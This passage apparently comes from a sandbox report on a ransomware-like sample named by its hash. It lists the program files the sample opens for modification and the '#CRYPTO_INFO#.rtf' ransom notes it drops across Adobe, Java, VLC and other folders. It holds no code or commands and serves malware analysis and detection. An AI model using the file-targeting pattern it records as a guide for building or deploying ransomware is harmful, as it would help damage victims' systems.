Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-favorites_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\license.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jstatd.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\tools.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\svgCheckboxUnselected.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Windows Photo Viewer\ImagingDevices.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\es-419_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\eu-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\en-GB.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.SF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_comment_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\cloud_secured.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\cli.luac 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons_retina_thumb.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ca-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\bg_patterns_header.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\close.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\icudtl.dat 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\optimize_poster.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\AppCenter_R.aapp 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\zh-tw\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons__retina_hiContrast_wob.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\uk-ua\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\edit_pdf_poster2x.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\eclipse_update_120.jpg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\fi-fi\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_download_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\dot_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\include\win32\bridge\AccessBridgePackages.h 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\delete.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\duplicate.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\selector.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_nextarrow_default.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\nl_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-fallback_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_move_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\PlayStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-down_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\cs-cz\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\selection-actions2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\file_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\ENUtxt.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.alert.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark2x.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ar-ae\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.apache.felix.gogo.shell_0.10.0.v201212101605.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticattribute.exsd 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\end_review.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_replace_signer_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\new_icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\ext\updater.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\lib\locale\boot_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\orb.idl 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-api.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\s_empty_folder_state.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\rhp_world_icon_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\psfont.properties.ja 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\cacerts 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\[email protected] 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ja.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ca.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader 